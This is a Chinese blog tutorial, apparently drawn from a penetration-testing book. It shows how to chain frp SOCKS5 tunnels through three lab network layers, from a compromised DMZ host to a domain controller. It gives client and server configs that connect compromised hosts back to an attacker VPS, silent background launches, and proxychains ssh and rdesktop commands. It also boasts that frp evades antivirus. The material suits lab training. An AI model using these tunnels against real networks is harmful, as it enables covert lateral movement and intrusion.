frp构建多级网络代理
创始人
2024-05-22 03:18:03
0

简介

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,采用 Golang 编写,支持跨平台,仅需下载对应平台的二进制文件即可执行,没有额外依赖。frp可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。且frp不会被杀软查杀!!

frp 有windows和linux两个版本, 主要包含以下文件:

  • frps,服务端程序;frps.ini,服务端配置文件。

  • frpc,客户端程序;frpc.ini,客户端配置文件。客户端 linux 和 windows 都支持 负责把本地的流量连到服务器

项目地址:https://github.com/fatedier/frp

项目文档:文档 | frp

多层网络实战

测试环境如下,图中右侧有三个内网区域

  • 第一层网络:192.168.10.0/24 vmnet1(仅主机模式)

  • 第二层网络:192.168.20.0/24 vmnet2

  • 第三层网络:192.168.30.0/24 vmnet3

并在真实机中将VMnet1/2/3全部禁用,真是机就访问不到此虚拟网络。

一级网络代理

假设已经获取win2012的控制权,经过弱口令爆破,获取了ubuntu主机的ssh的登录凭据,需要继续渗透并登录ftp服务器的ssh。在win2012上使用frp搭建socks5代理服务器,通过socks5代理连接到ubuntu服务器。

服务端启动

使用vps作为服务端,这里vps为linux,所以下载对应的linux包

然后进行解压,因为是服务端,所以只需要用到frps文件

  1. 服务端配置

服务端配置文件frps.ini的内容如下,默认绑定7000端口,等待来自frp客户端的连接。

[common]
bind_port = 7000     
  1. 启动服务端

./frps
#或者,不指定-c会默认加载这个文件
./frps -c frps.ini

客户端配置

这里客户端为windows,所以下载对应的windows版

需要用到的文件为frpc.exe和frpc.ini,可以将两个文件都改个名字再放上去

  1. 客户端配置

客户端配置文件frpc.ini内容如下,指定frp服务端代理的ip、端口以及攻击连接代理服务器的端口1080

[common]
#如果tls_enable为true,则frpc将通过tls连接frps。否则可能运行不起来
tls_enable = true
#指向frp服务端绑定的ip
server_addr = 172.16.2.2
#指向frp服务端绑定的端口
server_port = 7000[socks5]
#代理所使用的端口,会被转发到服务端
remote_port = 1080
plugin = socks5
  1. 启动客户端

使用win2012作为frp客户端,在win2012上执行如下命令,启动frp客户端。如果客户端为linux,启动方式也一样

frpc.exe -c frpc.ini             #运行时,按ctrl+c取消 会断开连接
#或
frpc.exe
#或者
start /b frpc.exe -c frpc.ini    #按ctrl+c取消,连接也不会断开。但是如果直接关闭此窗口则会断开连接

若客户端为linux

#启动
./frpc
#静默启动
nohup ./frpc >/dev/null 2>&1 & 
#停止
ps -aux|grep frp| grep -v grep
kill -9 pid号

此时,成功在win2012与vps之间搭建了一个socks5代理服务。然后,借助第三方工具,可以让计算机的其他应用使用这个代理,如Proxychains、Proxifier等。关于Proxifier的使用 —> https://www.yuque.com/chenchen-dqalz/qe15s1/cvd7gsnyl9067yhn

以Proxychains为例,编辑Proxychains的配置文件vim /etc/proxychains4.conf,将socks5代理服务器的地址指向frp服务端vps的地址,端口为1080

然后在命令前面加上“proxychains”,便可应用此socks5代理

proxychains ssh root@192.168.10.2

通过socks代理登录到内网ubuntu服务器

二级网络代理

获得dmz区域的ubuntu服务器控制权限后,经过信息收集,发现还有一个网段为192.168.20.x的办公区域网,需要继续渗透并登录文件服务器的远程桌面。用frp在dmz区与办公区之间搭建一个二级网络的socks5代理,从而访问办公区的文件服务器。

  1. 在vps上执行以下命令,启动frp服务端,服务端配置文件内容默认

[common]
bind_port = 7000     
启动服务端
./frps
  1. dmz区win2012上启动frp客户端

客户端frpc.ini内容如下,指定frp服务端代理的ip、端口、攻击连接代理服务器的端口

[common]
tls_enable = true
server_addr = 172.16.2.2
server_port = 7000[socks5_forward]
type=tcp
#代理所使用的端口,会被转发到服务端
remote_port = 1080
#本地监听的ip
local_ip = 192.168.10.9
#要转发的本地端口
local_port = 10808

在win2012上执行,启动frp客户端,连接vps服务器,同时将本地的10808端口转发到vps的1080端口

frpc.exe
  1. win2012上启动frp服务端

服务端配置文件frps.ini内容如下

[common]
#在win2012上的frp服务端绑定的ip
bind_addr = 192.168.10.9
#在win2012上的frp服务端绑定的端口
bind_port = 7000

启动服务端

./frps
  1. ubuntu启动frp客户端

配置文件frpc.ini内容如下

[common]
tls_enable = true
server_addr = 192.168.10.9
server_port = 7000[socks5]
type=tcp
remote_port = 10808
plugin = socks5
启动
./frpc

到此,在dmz区与办公区之间搭建了一个二级网络的socks5代理。同样,在/etc/proxychains4.conf最后一行添加“socks5 172.16.2.2 1080”,执行以下命令,即可通过该socks5代理连接办公区文件服务器的远程桌面

proxychains rdesktop 192.168.20.4

此时,即能访问第二层网络,也能访问第一层网络。

三级网络代理

入侵办公区后,经过信息收集,发现还有一个网段为192.168.30.x的核心网络需要继续渗透并登录域控制器的远程桌面。用frp在dmz区、办公区域核心区之间搭建一个三级网络的socks5代理,从而访问核心区的域控制器。

  1. 在vps上执行以下命令,启动frp服务端,服务端配置文件内容默认

[common]
bind_port = 7000     

启动服务端

./frps
  1. DMZ区win2012上启动frp客户端

客户端frpc.ini内容如下

[common]
tls_enable = true
server_addr = 172.16.2.2
server_port = 7000[socks5_forward]
type=tcp
#代理所使用的端口
remote_port = 1080
#本地监听的ip
local_ip = 192.168.10.9
#要转发的本地端口
local_port = 10808

在win2012上执行,启动frp客户端,连接vps服务器,同时将本地的10808端口转发到vps的1080端口

frpc.exe
  1. DMZ区win2012上启动frp服务端

服务端配置文件frps.ini内容如下

[common]
#在win2012上的frp服务端绑定的ip
bind_addr = 192.168.10.9
#在win2012上的frp服务端绑定的端口
bind_port = 7000

启动服务端

./frps
  1. DMZ区ubuntu启动frp客户端

配置文件frpc.ini内容如下,将本地10809端口转发到win2012的10808端口

[common]
tls_enable = true
server_addr = 192.168.10.9
server_port = 7000[socks5_forward]
type=tcp
remote_port = 10808
local_ip = 192.168.20.2
local_port = 10809
启动客户端
./frpc
  1. DMZ区ubuntu启动启动frp服务端

配置文件frps.ini内容如下

[common]
bind_addr = 192.168.20.2
bind_port = 7000
启动服务端
./frps
  1. 办公区win2012启动frp客户端

配置文件frpc.ini内容如下,并在10809端口上启动socks5代理服务后,转发到ubuntu服务器的10809端口

[common]
server_addr = 192.168.20.2
server_port = 7000[socks5]
type=tcp
remote_port = 10809
plugin = socks5

启动客户端

./frpc

到此,三级网络代理搭建完成。同样,在/etc/proxychains4.conf最后一行添加“socks5 172.16.2.2 1080”,执行以下命令,即可通过该socks5代理连接核心区域控制器的远程桌面

  • 参考:《内网渗透体系建设》

相关内容

热门资讯

学会宽容作文(推荐3篇) 学会宽容作文 篇一宽容是一种美德,它是人与人之间相处的一种智慧。在现代社会中,人们经常会面对各种各样...
一件高兴的事六年级作文【实用... 一件高兴的事六年级作文 篇一今天是一个特别高兴的日子,因为我终于完成了自己的绘画作品,而且还被老师选...
六年级上册语文第四单元作文(... 六年级上册语文第四单元作文 篇一篇一:我的梦想梦想是每个人心中的火花,它能给我们力量,让我们坚持不懈...
排队风波六年级作文(精彩3篇... 篇一:排队风波六年级作文排队是我们生活中常见的一种行为,它需要我们遵守一定的规则和秩序。然而,即使是...
致将要逝去的小学时光六年级作... 致将要逝去的小学时光六年级作文  在平平淡淡的日常中,大家总免不了要接触或使用作文吧,作文是由文字组...
游九华天池六年级作文600字... 游九华天池六年级作文600字 篇一:探秘九华天池九华天池是我国著名的高山湖泊,位于安徽省境内。上周末...
小学作文六年级我来了【优秀6... 小学作文六年级我来了 篇一第一篇内容我来到了小学六年级,这是我小学生涯的最后一年,也是最重要的一年。...
我眼中的秋天六年级作文【精彩... 我眼中的秋天六年级作文 篇一秋天是我最喜欢的季节,因为它有着丰富多彩的景色和美食。当秋天来临的时候,...
多彩的活动作文450字六年级... 多彩的活动作文450字六年级 篇一:植树活动植树活动是我们学校每年都会举行的一项重要活动。今年春天,...
六年级第二单元作文【优秀6篇... 六年级第二单元作文 篇一我最喜欢的动物我最喜欢的动物是狗。狗是一种非常聪明和忠诚的动物,它们总是对主...
畅想六年级作文300字(实用... 畅想六年级作文300字 篇一:我的未来梦想作为一个六年级的学生,我对未来有着许多美好的梦想。我希望能...
小学六年级暑假作文600字【... 小学六年级暑假作文600字 篇一:我的暑假计划暑假即将到来,我已经迫不及待地开始计划我的假期了。这个...
考试的心情六年级作文【优选3... 考试的心情六年级作文 篇一紧张的考试我是一个六年级的学生,每次考试都会让我感到紧张。无论是小测验还是...
电影天河观后感600(精彩5... 电影天河观后感600 篇一《天河》是一部中国科幻电影,讲述了被外星生物入侵的地球上,一群年轻人奋起抵...
小狗四年级的作文300字【优... 小狗四年级的作文300字 篇一我的朋友小狗我有一个非常好的朋友,他就是一只可爱的小狗。小狗是我家附近...
小事情大能量六年级作文(最新... 小事情大能量六年级作文 篇一标题:帮助他人的小事情作为一个六年级的学生,我深深地认识到一个小小的善举...
我的疑问四年级作文【优秀3篇... 我的疑问四年级作文 篇一我的疑问我是一个四年级的小学生,最近我有很多疑问,想要寻找答案。下面我就和大...
我是一根粉笔六年级作文650... 我是一根粉笔六年级作文650字 篇一我是一根粉笔我是一根粉笔,是学生们书写知识的工具。每天,当上课铃...
快乐的一天四年级优秀作文(优... 快乐的一天四年级优秀作文 篇一快乐的一天今天是一个特别快乐的一天,因为我参加了学校举办的运动会。运动...
森林里的声音作文500六年级... 森林里的声音作文600六年级 篇一:探秘神奇的森林森林里的声音,是如此的多样而又神奇。每当我进入森林...